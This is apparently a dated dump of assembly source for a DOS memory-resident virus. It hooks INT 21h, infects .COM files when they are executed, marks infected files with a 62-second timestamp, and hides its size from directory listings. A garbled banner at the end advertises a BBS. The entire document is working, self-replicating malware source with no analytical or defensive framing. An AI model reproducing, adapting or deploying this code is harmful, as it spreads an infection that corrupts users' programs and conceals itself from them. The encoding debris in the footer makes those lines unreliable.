2022-08-21 09:07:57 +00:00
;
;
;
org 100h
ofs:
push 100h
push ax
push ds
push es
mov dx , 054h - ( ofs / 16 )
mov es , dx
mov ax , es : ofs [ 0 ]
cmp ax , ofs [ 0 ]
je to_host
lea si , ofs
mov di , si
mov cx , virlength
rep movsb
mov ds , es
mov ax , 3521h
int 21h
mov word ptr ds : old21 [ 0 ], bx
mov word ptr ds : old21 [ 2 ], es
mov ax , 2521h
lea dx , new21
int 21h
to_host: pop es
pop ds
mov di , 0fe00h
lea si , relocator
mov cx , rellength
rep movsb
jmp 0fe00h
old21 dd 0
relocator:
mov di , 100h
orgofs: lea si , orgp
mov cx , virlength
rep movsb
pop ax
ret
rellength equ $ - relocator
new21:
cmp ah , 11h
je findfcb
cmp ah , 12h
je findfcb
cmp ah , 4eh
je find
cmp ah , 4fh
je find
cmp ax , 4b00h
je exec
jmp short dword ptr cs :[ old21 ]
getdta:
pop si
pushf
push ax
push bx
push es
mov ah , 2fh
call dos
jmp short si
FindFCB: call DOS ; call orginal interrupt
cmp al , 0 ; error ?
jne Ret1
call getdta
cmp byte ptr es :[ bx ], - 1 ; extended fcb ?
jne FCBOk
add bx , 8 ; yes, skip 8 bytes
FCBOk: mov al , es :[ bx + 16h ] ; get file-time (low byte)
and al , 1fh ; seconds
cmp al , 1fh ; 62 seconds ?
jne FileOk ; no, file not infected
sub word ptr es :[ bx + 1ch ], Virlength ; adjust file-size
sbb word ptr es :[ bx + 1eh ], 0
jmp short Time
Find: call DOS
jc Ret1
call getdta
mov al , es :[ bx + 16h ]
and al , 1fh
cmp al , 1fh
jne FileOk
sub word ptr es :[ bx + 1ah ], VirLength
sbb word ptr es :[ bx + 1ch ], 0
Time: xor byte ptr es :[ bx + 16h ], 10h
FileOk: pop es
pop bx
pop ax
popf
Ret1: retf 2
exec: push ax
push bx
push cx
push dx
push ds
push es
mov ax , 3d02h
call dos
mov bx , 0bc00h
mov ds , bx
mov bh , 3fh
xchg ax , bx
xor dx , dx
mov cx , virlength
call dos
cmp word ptr ds :[ 0 ], 'ZM'
je exe
cmp word ptr ds :[ 0 ], 0068h ; push 100
jne noexe
exe: mov ah , 3eh
call dos
pop es
pop ds
pop dx
pop cx
pop bx
pop ax
jmp short dword ptr cs :[ old21 ]
noexe: mov ax , 4202h
xor cx , cx
xor dx , dx
call dos
cmp ax , 0fd00h
jae exe
cmp ax , virlength + 10
jb exe
inc ah
mov word ptr cs : orgofs [ 1 ], ax
mov ax , 5700h
call dos
or cx , 1fh
push cx
push dx
mov ah , 40h
xor dx , dx
mov cx , virlength
push cx
call dos
mov ax , 4200h
xor cx , cx
xor dx , dx
call dos
mov ah , 40h
mov ds , cs
lea dx , ofs
pop cx
call dos
mov ax , 5701h
pop dx
pop cx
call dos
jmp short exe
dos: pushf
call dword ptr cs :[ old21 ]
ret
virlength equ $ - ofs
orgp: int 20h
; <20> <> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD>
; <20> <> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> > and Remember Don't Forget to Call <<3C> <> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD>
; <20> <> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> > ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <<3C> <> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD>
; <20> <> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD> <EFBFBD>
